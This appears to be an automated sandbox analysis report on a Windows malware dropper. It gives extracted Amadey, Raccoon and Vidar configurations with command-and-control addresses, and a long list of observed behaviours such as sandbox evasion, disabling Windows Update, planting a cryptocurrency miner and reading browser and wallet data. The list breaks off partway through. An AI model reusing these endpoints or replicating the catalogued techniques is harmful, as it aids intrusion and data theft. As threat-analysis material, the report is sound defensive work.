Analysis
-
max time kernel
152s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
30-01-2023 19:33
Static task
static1
Behavioral task
behavioral1
Sample
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
Resource
win10v2004-20221111-en
General
-
Target
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe
-
Size
8.0MB
-
MD5
bf3ba6986c24b775418721fdbbe75f5c
-
SHA1
a46212c6d3d8329135b4780786b5581c6c2bb5b4
-
SHA256
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24
-
SHA512
cc16a928eb457bccd1a70cb7fd075364f1fa120bbf0ea347f9b4310fda7828807502355d8d209d8fd4c3d664af16732226eacf553d4980f5ee59c8f3409693f5
-
SSDEEP
196608:5pDVnj97FG29WPpw4xOQiuIQz1wckK2m:5pJnZh4G4xOhuIQzpZ2
Malware Config
Extracted
amadey
3.65
77.73.134.27/8bmdh3Slb2/index.php
Extracted
raccoon
04f8fa0bf52b1b98a127f6deeac54f84
http://94.131.3.70/
http://83.217.11.11/
http://83.217.11.13/
http://83.217.11.14/
http://45.15.156.222/
Extracted
vidar
2.3
736
https://t.me/mantarlars
https://steamcommunity.com/profiles/76561199474840123
-
profile_id
736
Signatures
-
Detects Smokeloader packer 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4152-197-0x0000000004790000-0x0000000004799000-memory.dmp family_smokeloader -
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4420 2204 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4520 2204 rundll32.exe -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
Processes:
XandETC.exeupdater.execonhost.exedescription pid process target process PID 3436 created 676 3436 XandETC.exe Explorer.EXE PID 3436 created 676 3436 XandETC.exe Explorer.EXE PID 3436 created 676 3436 XandETC.exe Explorer.EXE PID 3436 created 676 3436 XandETC.exe Explorer.EXE PID 3436 created 676 3436 XandETC.exe Explorer.EXE PID 2148 created 676 2148 updater.exe Explorer.EXE PID 2148 created 676 2148 updater.exe Explorer.EXE PID 2148 created 676 2148 updater.exe Explorer.EXE PID 2148 created 676 2148 updater.exe Explorer.EXE PID 2148 created 676 2148 updater.exe Explorer.EXE PID 4804 created 676 4804 conhost.exe Explorer.EXE PID 2148 created 676 2148 updater.exe Explorer.EXE PID 2148 created 676 2148 updater.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
birge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ birge.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp xmrig behavioral2/memory/4208-331-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 85 2384 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
Processes:
Player3.exepb1111.exeslwang.exenbveek.exebirge.exeslwang.exepb1111.exerandom.exerandom.exeXandETC.exeChromeSetup.exedownload.exedownload.exenbveek.exe36A0.exeupdater.exenbveek.exenbveek.exepid process 592 Player3.exe 932 pb1111.exe 1260 slwang.exe 1412 nbveek.exe 3028 birge.exe 1876 slwang.exe 4048 pb1111.exe 3968 random.exe 4608 random.exe 3436 XandETC.exe 4152 ChromeSetup.exe 4216 download.exe 64 download.exe 1260 nbveek.exe 520 36A0.exe 2148 updater.exe 2396 nbveek.exe 4464 nbveek.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/4208-329-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp upx behavioral2/memory/4208-331-0x00007FF6B52E0000-0x00007FF6B5AD4000-memory.dmp upx -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\pb1111.exe vmprotect C:\Users\Admin\AppData\Local\Temp\pb1111.exe vmprotect behavioral2/memory/932-145-0x0000000140000000-0x0000000140618000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe vmprotect C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe vmprotect behavioral2/memory/4048-170-0x0000000140000000-0x000000014061A000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
birge.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion birge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion birge.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exePlayer3.exenbveek.exeslwang.exerandom.exedownload.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation 2e09674fc46e09a14bcfc5e3078de72c91c17d6fd3aac5146677cbe94a784d24.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation Player3.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation nbveek.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation slwang.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation download.exe -
Loads dropped DLL 7 IoCs
Processes:
rundll32.exerundll32.exedownload.exerundll32.exerundll32.exerundll32.exepid process 4156 rundll32.exe 2900 rundll32.exe 4216 download.exe 4216 download.exe 960 rundll32.exe 3784 rundll32.exe 2384 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
birge.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA birge.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
birge.exepid process 3028 birge.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
rundll32.exeupdater.exedescription pid process target process PID 2384 set thread context of 3892 2384 rundll32.exe rundll32.exe PID 2148 set thread context of 4804 2148 updater.exe conhost.exe PID 2148 set thread context of 4208 2148 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
XandETC.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 756 sc.exe 1388 sc.exe 600 sc.exe 3828 sc.exe 2836 sc.exe 3780 sc.exe 4748 sc.exe 4356 sc.exe 4028 sc.exe 4668 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 1280 4156 WerFault.exe rundll32.exe 5060 2900 WerFault.exe rundll32.exe 2876 4216 WerFault.exe download.exe 4832 4216 WerFault.exe download.exe 2604 3784 WerFault.exe rundll32.exe 4996 520 WerFault.exe 36A0.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
ChromeSetup.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ChromeSetup.exe -
Checks processor information in registry 2 TTPs 26 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
rundll32.exedownload.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 download.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString download.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 rundll32.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information rundll32.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2208 timeout.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.execonhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Modifies registry class 25 IoCs
Processes:
download.exerundll32.exeExplorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings download.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 rundll32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff rundll32.exe Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 rundll32.exe Set value (data) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\NodeSlot = "2" Explorer.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 8 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 25 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
Explorer.EXEpid process 676 Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
birge.exeChromeSetup.exeExplorer.EXEdownload.exepid process 3028 birge.exe 3028 birge.exe 3028 birge.exe 3028 birge.exe 3028 birge.exe 3028 birge.exe 4152 ChromeSetup.exe 4152 ChromeSetup.exe 676 Explorer.EXE 676 Explorer.EXE 4216 download.exe 4216 download.exe 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE 676 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 676 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
ChromeSetup.exepid process 4152 ChromeSetup.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Explorer.EXEpowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeShutdownPrivilege 676 Explorer.EXE Token: SeCreatePagefilePrivilege 676 Explorer.EXE Token: SeShutdownPrivilege 676 Explorer.EXE Token: SeCreatePagefilePrivilege 676 Explorer.EXE Token: SeShutdownPrivilege 676 Explorer.EXE Token: SeCreatePagefilePrivilege 676 Explorer.EXE Token: SeShutdownPrivilege 676 Explorer.EXE Token: SeCreatePagefilePrivilege 676 Explorer.EXE Token: SeShutdownPrivilege 676 Explorer.EXE Token: SeCreatePagefilePrivilege 676 Explorer.EXE Token: SeDebugPrivilege 3764 powershell.exe Token: SeShutdownPrivilege 676 Explorer.EXE Token: SeCreatePagefilePrivilege 676 Explorer.EXE Token: SeDebugPrivilege 4776 powershell.exe Token: SeShutdownPrivilege 2076 powercfg.exe Token: SeCreatePagefilePrivilege 2076 powercfg.exe Token: SeShutdownPrivilege 1780 powercfg.exe Token: SeCreatePagefilePrivilege 1780 